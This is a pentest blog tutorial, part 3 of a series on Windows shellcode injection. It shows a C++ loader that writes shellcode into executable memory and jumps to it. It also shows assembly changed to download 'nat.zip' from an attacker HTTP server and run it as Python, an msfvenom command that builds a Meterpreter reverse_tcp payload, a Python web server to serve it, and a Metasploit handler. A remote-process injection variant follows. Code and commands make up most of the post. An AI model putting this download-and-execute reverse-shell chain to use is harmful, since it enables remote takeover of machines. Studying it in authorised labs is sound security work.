{{tag>IT-Security Windows Kali pentest blog english}}
====== Shellcode Injection Part 3 ======

{{it-security:blog:shellcode-part-3.png?400|}}

Shellcode injections are generally used to initiate a reverse shell. However, in some circumstances it may be necessary to load the code for the shell in the second step.

In this blog post, I show how we can use a shellcode injection to load a file via HTTP and then execute it.
\\
\\

===== Code =====

==== C++ source ====

First, we need a small programme that loads the shellcode into memory and then jumps into it.

<code cpp>
...
//buf represents the shellcode
unsigned char buf[] =
"\xeb\x74\x31\...\x69\x70\x00";

int main(int argc, char** argv) {
...
    //allocate memory
	void* stage = VirtualAlloc(0, 0x1000, 0x1000, 0x40);
	void (*target)();
...
	//move the shellcode into memory
	memmove(stage, buf, 0x1000);
...
	//move shellcode address to eax and jump
	__asm {
		mov eax, target
		jmp eax
	}
}
</code>

You can find the complete code in the [[https://github.com/psycore8/nosoc-shellcode/tree/main/nosoc-shellcode-3|Repository]].
\\
\\
==== Assembly ====

A well documented assembler code can be found in the [[https://github.com/stephenbradshaw/shellcode/blob/master/descript.asm|Repository by Stephen Bradshaw]].

=== Customise assembly ===

The code executes a downloaded VBS file. However, we want to start a Python script that creates a Meterpreter shell. To do this, we change the following places:

<code stylus>
;Zeile 143 / +7 marks the beginning of the filename (WindowsAgent.py)
lea edx, [esi + 7]	

;Zeile 184 / command line to execute
db "python WindowsAgent.py", 0 

;Zeile 192 / our URL
db "http://172.26.72.38/nat.zip", 0
</code>
\\
\\
=== Create shellcode ===

We have to create the shellcode as ''%%x86 Windows%%'' binary file. We do this with ''%%nasm%%'':

<code bash>
nasm -f win32 download.asm -o shellcode.o
</code>

We now let the binary ''%%C++%%'' friendly display:

<code bash>
objdump -D ./shellcode.o |grep '[0-9a-f]:'|grep -v 'file'|cut -f2 -d:|cut -f1-6 -d' '|tr -s ' '|tr '\t' ' '|sed 's/ $//g'|sed 's/ /\\x/g'|paste -d '' -s |sed 's/^/"/'|sed 's/$/"/g'
</code>

We use the output as shellcode in our ''%%C++%%'' code and compile our project.
\\
\\
=== Test shellcode ===

To understand the shellcode, we then debug the programme. We search for the call of the function ''%%main()%%''

{{it-security:blog:2024-120_-1.png}}

From ''%%main()%%'' we are looking for the jump to the shellcode memory area. In our program, we have implemented this with inline assembly: ''%%call eax%%''. This looks like this in the debugger:

{{it-security:blog:2024-120_-2.png}}

If we now jump in, we see our shellcode:

{{it-security:blog:2024-120_-3.png}}

From here we can understand and test the procedures.
\\
\\
===== Payload =====

==== Prepare metrepreter payload ====

As mentioned at the beginning, we want to create a Meterpreter shell using Python. So we need a corresponding payload. We generate this with ''%%msfvenom%%''.

<code bash>
msfvenom -p python/meterpreter/reverse_tcp LHOST=172.26.72.38 LPORT=4500 > payload.py
</code>

The shellcode loads the file ''%%nat.zip%%'' from an HTTP server, saves it as ''%%WindowsAgent.py%%'' and then executes it. So we prepare this accordingly:

<code bash>
cp payload.py nat.zip

python -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
</code>

Last but not least, we need a Metasploit handler that receives our shell. This can be created using the script ''%%nosoc3.rc%%'' script:

<code ruby>
msf6 > resource nosoc3.rc
[*] Processing /home/kali/nosoc3.rc for ERB directives.
resource (/home/kali/nosoc3.rc)> use exploit/multi/handler
[*] Using configured payload generic/shell_reverse_tcp
resource (/home/kali/nosoc3.rc)> set payload python/meterpreter/reverse_tcp
payload => python/meterpreter/reverse_tcp
resource (/home/kali/nosoc3.rc)> set lhost 0.0.0.0
lhost => 0.0.0.0
resource (/home/kali/nosoc3.rc)> set lport 4500
lport => 4500
resource (/home/kali/nosoc3.rc)> run

[*] Started reverse TCP handler on 0.0.0.0:4500 
</code>

Now everything is ready.
\\
\\
==== Attack ====

Now start the programme on the target PC.

{{it-security:blog:2024-120_-4.png}}

The Python script is downloaded:

{{it-security:blog:2024-120_-5.png}}

And finally we are greeted by a Meterpreter shell:

{{it-security:blog:2024-120_-6.png}}
\\
\\
===== CreateRemoteThread =====

Of course, we can also inject the shellcode into external processes. An example programme for this is also available in the repository. To start, the target PID must be passed as an argument:

<code batch>
RemoteInject.exe 10001
</code>
\\
\\
===== Repository =====

<code bash>
git clone https://github.com/psycore8/nosoc-shellcode
</code>

~~DISCUSSION~~